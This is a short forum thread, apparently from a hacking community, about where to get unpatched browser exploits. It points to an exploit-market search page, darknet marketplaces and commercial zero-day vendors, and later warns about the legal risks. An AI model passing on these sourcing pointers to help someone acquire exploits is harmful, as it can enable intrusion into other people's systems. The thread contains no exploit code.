If you really want a browser exploit that hasn’t been patched, you might have to buy one.

http://1337day.com/search
Search for “browser”

SFisher
9 years ago

0

Sorry but… buying an exploit that will last 2 days with an unknown number of other buyers doesn’t seem clever to me.
Also, surface sites are crap for this, better to find a trusted underground market in an alternative network.

If you really want a browser exploit that hasn’t been patched, do it yourself. :)
Makes sense?

jayssj11
9 years ago

0

Grams Darknet Search Engine may be good for underground markets or the darknet
http://thehackernews.com/2014/04/grams-first-search-engine-for.html

SFisher
9 years ago | edited 9 years ago

0

Well that might be OK, but I wasn’t talking about Tor network. In my opinion “the onion is dead”. I don’t like it.
There are other alternatives for deep web and there are also legit vendors there and in the surface.
Exodus and Revuln are 2 big enterprises with international reputation.
But then again, this is not for someone who has no idea about exploits nor for evil geniuses. The scope of these services is to:
1. Make your organization or enterprise more secure and have an advantage against the competitors by patching holes that haven’t been documented yet.
2. Obtain critical intelligence by exploiting such holes in the infrastructures of competitors.

Real evil geniuses know how to look for this themselves. They often work for intel agencies, enterprises like the ones I mentioned or advanced hacker organizations. I’m not talking about Anonymous and its ‘sophisticated’ social engineering and DDoS attacks.

Kids who know little will throw away their parents' money for nothing, be subject to identity theft or Law Enforcement investigation, or if they actually get anything for the money, either not know how to use it, use it in a wrong way, mess with people they shouldn’t mess with, be subject to identity theft (pwned “hacker”) and Law Enforcement investigation. Using Tor doesn’t protect you from this.

Not telling anyone “don’t do things”, just explaining that things are not as simple as “click click click done”, and that risking your future for showing your friends how cool you are… is not worth it.
However again it’s up to each of us to reflect on our motivations, our means and our responsibilities.

Just my opinion in any case.
